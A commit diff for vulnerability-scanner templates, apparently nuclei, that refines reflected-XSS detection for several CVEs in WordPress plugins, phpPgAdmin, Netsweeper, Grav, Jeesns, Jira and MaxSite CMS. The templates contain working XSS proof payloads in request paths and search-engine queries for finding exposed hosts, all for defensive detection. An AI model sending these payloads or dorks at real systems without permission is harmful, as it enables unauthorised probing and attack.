Update XSS - False positive

.nuclei-ignore

@@ -24,16 +24,8 @@ tags:
 
 files:
   - http/cves/2006/CVE-2006-1681.yaml
-  - http/cves/2007/CVE-2007-5728.yaml
-  - http/cves/2011/CVE-2011-4618.yaml
-  - http/cves/2014/CVE-2014-9608.yaml
-  - http/cves/2018/CVE-2018-5316.yaml
-  - http/cves/2018/CVE-2018-5233.yaml
   - http/cves/2019/CVE-2019-14696.yaml
-  - http/cves/2020/CVE-2020-11930.yaml
-  - http/cves/2020/CVE-2020-19295.yaml
   - http/cves/2020/CVE-2020-2036.yaml
   - http/cves/2020/CVE-2020-28351.yaml
-  - http/cves/2021/CVE-2021-35265.yaml
   - http/vulnerabilities/oracle/oracle-ebs-xss.yaml
   - http/vulnerabilities/other/nginx-module-vts-xss.yaml

http/cves/2007/CVE-2007-5728.yaml

@@ -28,13 +28,16 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
+      - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '<script>alert("document.domain")</script>'
+          - '<script>alert(document.domain)</script>'
+          - 'phpPgAdmin'
+        condition: and
+        case-insensitive: true
 
       - type: word
         part: header

http/cves/2011/CVE-2011-4618.yaml

@@ -27,22 +27,20 @@ info:
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
 http:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+  - raw:
+      - |
+        GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1
+        Host: {{Hostname}}
 
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "</script><script>alert(document.domain)</script>"
-
-      - type: word
-        part: header
-        words:
-          - text/html
+      - |
+        GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+        Host: {{Hostname}}
 
-      - type: status
-        status:
-          - 200
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(header_2, "text/html")'
+          - 'contains(body_2, "</script><script>alert(document.domain)</script>")'
+          - 'contains(body_1, "Advanced Text Widget")'
+        condition: and

http/cves/2014/CVE-2014-4592.yaml

@@ -4,7 +4,8 @@ info:
   name: WP Planet <= 0.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
+  description: |
+    A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
   reference:
     - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4592
@@ -14,33 +15,40 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2014-4592
     cwe-id: CWE-79
+    cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:*:*:*
     epss-score: 0.00135
-    cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:*
   metadata:
     max-request: 1
     google-query: inurl:"/wp-content/plugins/wp-planet"
-    framework: wordpress
-    vendor: czepol
-    product: wp-planet
   tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+  - raw:
+      - |
+        GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_1
+        words:
+          - "WP Planet"
+
+      - type: word
+        part: body_2
         words:
           - "<script>alert(document.domain)</script>"
 
       - type: word
-        part: header
+        part: header_2
         words:
           - text/html
 
       - type: status
         status:
-          - 200
+          - 200

http/cves/2014/CVE-2014-9608.yaml

@@ -4,7 +4,8 @@ info:
   name: Netsweeper 4.0.3 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
+  description: |
+    A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9608
@@ -34,11 +35,18 @@ http:
         words:
           - '</script><script>alert(document.domain)</script>'
 
+      - type: word
+        part: header
+        words:
+          - 'webadminU='
+          - 'webadmin='
+        condition: or
+
       - type: word
         part: header
         words:
           - text/html
 
       - type: status
         status:
-          - 200
+          - 200

http/cves/2018/CVE-2018-5233.yaml

@@ -19,6 +19,7 @@ info:
     cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:*
   metadata:
     max-request: 1
+    shodan-query: html:"Grav CMS"
     vendor: getgrav
     product: grav_cms
   tags: cve,cve2018,xss,grav
@@ -35,11 +36,19 @@ http:
         words:
           - '</script><script>alert(document.domain)</script>'
 
+      - type: word
+        part: body
+        words:
+          - '/themes/grav'
+          - 'Grav Admin Login'
+          - 'data-grav-'
+        condition: or
+
       - type: word
         part: header
         words:
           - text/html
 
       - type: status
         status:
-          - 200
+          - 200

http/cves/2018/CVE-2018-5316.yaml

@@ -19,22 +19,25 @@ info:
     cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:*
   metadata:
     max-request: 1
+    verified: true
     framework: wordpress
     vendor: patsatech
     product: sagepay_server_gateway_for_woocommerce
-  tags: cve2018,wordpress,xss,wp-plugin,woocommerce,packetstorm,cve
+  tags: cve2018,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,cve
 
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>"><script>alert(document.domain)</script>'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "</script><script>alert(document.domain)</script>"
+          - '</script>"><script>alert(document.domain)</script>'
+          - 'Authenticate your card'
+        condition: and
 
       - type: word
         part: header
@@ -43,4 +46,4 @@ http:
 
       - type: status
         status:
-          - 200
+          - 200

http/cves/2020/CVE-2020-11930.yaml

@@ -21,22 +21,25 @@ info:
     cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:*
   metadata:
     max-request: 1
+    publicwww-query: "/wp-content/plugins/gtranslate"
     framework: wordpress
     vendor: gtranslate
     product: translate_wordpress_with_gtranslate
-  tags: cve,cve2020,wordpress,xss,plugin,wpscan
+  tags: cve,cve2020,wordpress,wp,xss,wp-plugin,wpscan
 
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert("XSS")%3C/script%3E<img%20src=x'
+      - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '<script>alert("XSS")</script>'
+          - '<script>alert(document.domain)</script>'
+          - 'uri-translation'
+        condition: and
 
       - type: word
         part: header
@@ -45,4 +48,4 @@ http:
 
       - type: status
         status:
-          - 200
+          - 200

http/cves/2020/CVE-2020-19295.yaml

@@ -18,6 +18,7 @@ info:
     cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*
   metadata:
     max-request: 1
+    fofa-query: title="Jeesns"
     vendor: jeesns
     product: jeesns
   tags: cve,cve2020,jeesns,xss
@@ -33,6 +34,9 @@ http:
         part: body
         words:
           - '</script><script>alert(document.domain)</script>'
+          - 'JEESNS'
+        condition: and
+        case-insensitive: true
 
       - type: word
         part: header
@@ -41,4 +45,4 @@ http:
 
       - type: status
         status:
-          - 200
+          - 200

http/cves/2020/CVE-2020-9344.yaml

@@ -15,13 +15,12 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2020-9344
     cwe-id: CWE-79
-    epss-score: 0.00205
     cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:*
+    epss-score: 0.00205
   metadata:
     max-request: 5
+    verified: true
     shodan-query: http.component:"Atlassian Jira"
-    vendor: atlassian
-    product: subversion_application_lifecycle_management
   tags: cve,cve2020,atlassian,jira,xss
 
 http:
@@ -39,6 +38,10 @@ http:
         part: body
         words:
           - "<script>alert(document.domain)</script>"
+          - "jira"
+          - "subversion"
+        condition: and
+        case-insensitive: true
 
       - type: word
         part: header
@@ -47,4 +50,4 @@ http:
 
       - type: status
         status:
-          - 200
+          - 200

http/cves/2021/CVE-2021-35265.yaml

@@ -1,10 +1,11 @@
 id: CVE-2021-35265
 
 info:
-  name: MaxSite CMS Cross-Site Scripting
+  name: MaxSite CMS > V106 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page."
+  description: |
+    A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page."
   reference:
     - https://github.com/maxsite/cms/issues/414#issue-726249183
     - https://nvd.nist.gov/vuln/detail/CVE-2021-35265
@@ -18,22 +19,31 @@ info:
     cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:*
   metadata:
     max-request: 2
+    shodan-query: html:'content="MaxSite CMS'
     vendor: maxsite
     product: maxsite_cms
   tags: cve,cve2021,maxsite,xss
 
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-      - '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E'
+      - '{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '</script><script>alert(document.domain)</script>'
+          - '><svg/onload=alert(document.domain)>'
+
+      - type: word
+        part: body
+        words:
+          - 'mso-comments-rss">RSS</a>'
+          - 'MaxSite CMS'
+          - 'feed"><span>RSS</span>'
+        condition: or
 
       - type: word
         part: header
@@ -42,4 +52,4 @@ http:
 
       - type: status
         status:
-          - 200
+          - 200